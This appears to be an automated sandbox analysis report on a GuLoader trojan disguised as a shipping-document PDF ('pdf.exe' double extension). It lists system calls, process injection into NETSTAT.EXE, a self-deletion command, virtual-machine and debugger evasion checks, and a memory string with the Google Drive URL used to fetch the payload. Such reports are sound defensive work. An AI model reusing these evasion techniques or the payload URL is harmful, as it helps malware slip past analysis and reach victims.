Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32AA0 NtQueryInformationFile, 6_2_1EA32AA0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32A80 NtClose, 6_2_1EA32A80
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32AC0 NtEnumerateValueKey, 6_2_1EA32AC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32A10 NtWriteFile, 6_2_1EA32A10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32B80 NtCreateKey, 6_2_1EA32B80
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32BE0 NtQueryVirtualMemory, 6_2_1EA32BE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32B20 NtQueryInformationProcess, 6_2_1EA32B20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32B00 NtQueryValueKey, 6_2_1EA32B00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA338D0 NtGetContextThread, 6_2_1EA338D0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA329D0 NtWaitForSingleObject, 6_2_1EA329D0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA334E0 NtCreateMutant, 6_2_1EA334E0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA34570 NtSuspendThread, 6_2_1EA34570
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA34260 NtSetContextThread, 6_2_1EA34260
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF34E0 NtCreateMutant,LdrInitializeThunk, 8_2_02FF34E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2A80 NtClose,LdrInitializeThunk, 8_2_02FF2A80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2BC0 NtQueryInformationToken,LdrInitializeThunk, 8_2_02FF2BC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2B90 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_02FF2B90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2B80 NtCreateKey,LdrInitializeThunk, 8_2_02FF2B80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2B10 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_02FF2B10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2B00 NtQueryValueKey,LdrInitializeThunk, 8_2_02FF2B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF29F0 NtReadFile,LdrInitializeThunk, 8_2_02FF29F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2E50 NtCreateSection,LdrInitializeThunk, 8_2_02FF2E50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2F00 NtCreateFile,LdrInitializeThunk, 8_2_02FF2F00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2CF0 NtDelayExecution,LdrInitializeThunk, 8_2_02FF2CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2C30 NtMapViewOfSection,LdrInitializeThunk, 8_2_02FF2C30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_02FF2DC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2D10 NtQuerySystemInformation,LdrInitializeThunk, 8_2_02FF2D10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF4260 NtSetContextThread, 8_2_02FF4260
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF4570 NtSuspendThread, 8_2_02FF4570
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2AC0 NtEnumerateValueKey, 8_2_02FF2AC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2AA0 NtQueryInformationFile, 8_2_02FF2AA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2A10 NtWriteFile, 8_2_02FF2A10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2BE0 NtQueryVirtualMemory, 8_2_02FF2BE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2B20 NtQueryInformationProcess, 8_2_02FF2B20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF38D0 NtGetContextThread, 8_2_02FF38D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF29D0 NtWaitForSingleObject, 8_2_02FF29D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2ED0 NtResumeThread, 8_2_02FF2ED0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2EC0 NtQuerySection, 8_2_02FF2EC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2EB0 NtProtectVirtualMemory, 8_2_02FF2EB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2E80 NtCreateProcessEx, 8_2_02FF2E80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2E00 NtQueueApcThread, 8_2_02FF2E00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2FB0 NtSetValueKey, 8_2_02FF2FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2F30 NtOpenDirectoryObject, 8_2_02FF2F30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2CD0 NtEnumerateKey, 8_2_02FF2CD0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF3C90 NtOpenThread, 8_2_02FF3C90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2C50 NtUnmapViewOfSection, 8_2_02FF2C50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF3C30 NtOpenProcessToken, 8_2_02FF3C30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2C20 NtSetInformationFile, 8_2_02FF2C20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2C10 NtOpenProcess, 8_2_02FF2C10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2DA0 NtReadVirtualMemory, 8_2_02FF2DA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2D50 NtWriteVirtualMemory, 8_2_02FF2D50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281A350 NtCreateFile, 8_2_0281A350
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281A480 NtClose, 8_2_0281A480
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281A400 NtReadFile, 8_2_0281A400
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281A530 NtAllocateVirtualMemory, 8_2_0281A530
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281A3FA NtReadFile, 8_2_0281A3FA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281A52A NtAllocateVirtualMemory, 8_2_0281A52A
Sample file is different than original file name gathered from version info
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBEGRLIGHED.exe vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000000.22296662367.000000000042C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBEGRLIGHED.exe vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22830890524.000000001EC90000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe Binary or memory string: OriginalFilenameBEGRLIGHED.exe vs Arrival Notice, CIA Awb Inv Form.pdf.exe
PE file contains strange resources
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: edgegdi.dll Jump to behavior
PE / OLE file has an invalid certificate
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe Static PE information: invalid certificate
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe Virustotal: Detection: 37%
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe ReversingLabs: Detection: 31%
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Process created: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Process created: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe File created: C:\Users\user\AppData\Local\Temp\~DF37AB796C0CD232D7.TMP Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/1@23/11
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1324:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1324:120:WilError_03
Source: Binary string: netstat.pdbGCTL source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp
Source: Binary string: netstat.pdb source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Arrival Notice, CIA Awb Inv Form.pdf.exe, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000006.00000000.22299792619.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_00403EA8 push es; ret 1_2_00403EB7
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_00406105 pushfd ; ret 1_2_00406106
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_004057C0 push esp; ret 1_2_004057C1
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B63C50 pushad ; retf 1_2_02B63C51
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6593E push di; ret 1_2_02B65969
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6590E push di; ret 1_2_02B65969
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B65372 pushfd ; ret 1_2_02B65379
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6255E push edx; retf 1_2_02B6255F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F08CD push ecx; mov dword ptr [esp], ecx 6_2_1E9F08D6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_005740AC push 8482D2CCh; retf 6_2_005740B8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FB08CD push ecx; mov dword ptr [esp], ecx 8_2_02FB08D6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281C0DA push edx; ret 8_2_0281C0DE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_028171D9 push es; retf 8_2_028171DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281D4A5 push eax; ret 8_2_0281D4F8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281D4F2 push eax; ret 8_2_0281D4F8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281D4FB push eax; ret 8_2_0281D562
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281D55C push eax; ret 8_2_0281D562
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281696B push ebp; ret 8_2_0281696C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281DE1A push ss; iretd 8_2_0281DE21

Persistence and Installation Behavior:

barindex
Creates processes with suspicious names
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe File created: \arrival notice, cia awb inv form.pdf.exe
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe File created: \arrival notice, cia awb inv form.pdf.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xED
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" Jump to behavior
Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: pdf.exe Static PE information: Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=16IGYRUBEYI1SLH2LFQBJS2GGTY9BFGFC
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22305245204.0000000004DD0000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22305245204.0000000004DD0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22301946477.00000000005E4000.00000004.00000020.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE(Q^
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 4296 Thread sleep count: 160 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 4296 Thread sleep time: -320000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4432 Thread sleep count: 111 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4432 Thread sleep time: -222000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6CE40 rdtsc 6_2_1EA6CE40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe System information queried: ModuleInformation Jump to behavior
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22305245204.0000000004DD0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625529754.0000000000908000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817351739.0000000000907000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707817785.000000001066F000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22301946477.00000000005E4000.00000004.00000020.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe(Q^
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22305245204.0000000004DD0000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWlS
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW@
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6CE40 rdtsc 6_2_1EA6CE40
Enables debug privileges
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6F8FD mov eax, dword ptr fs:[00000030h] 1_2_02B6F8FD
